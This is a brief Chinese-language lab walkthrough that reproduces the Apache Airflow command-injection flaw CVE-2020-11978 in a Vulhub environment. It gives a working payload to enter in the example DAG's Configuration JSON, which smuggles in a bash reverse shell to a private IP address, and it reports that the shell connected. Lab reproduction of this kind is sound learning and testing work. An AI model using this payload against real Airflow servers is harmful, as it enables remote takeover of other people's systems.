Vulhub Apache Airflow (CVE-2020-11978)
来到目录下初始化数据库

然后开启环境

查看端口访问


访问`http://your-ip:8080`进入airflow管理端,将`example_trigger_target_dag`前面的Off改为On:

再点击执行按钮,在Configuration JSON中输入:{"message":"'\";bash -i >& /dev/tcp/192.168.94.129/9999 0>&1;#"}

运行完,可以看到成功反弹shell,可以命令执行了。

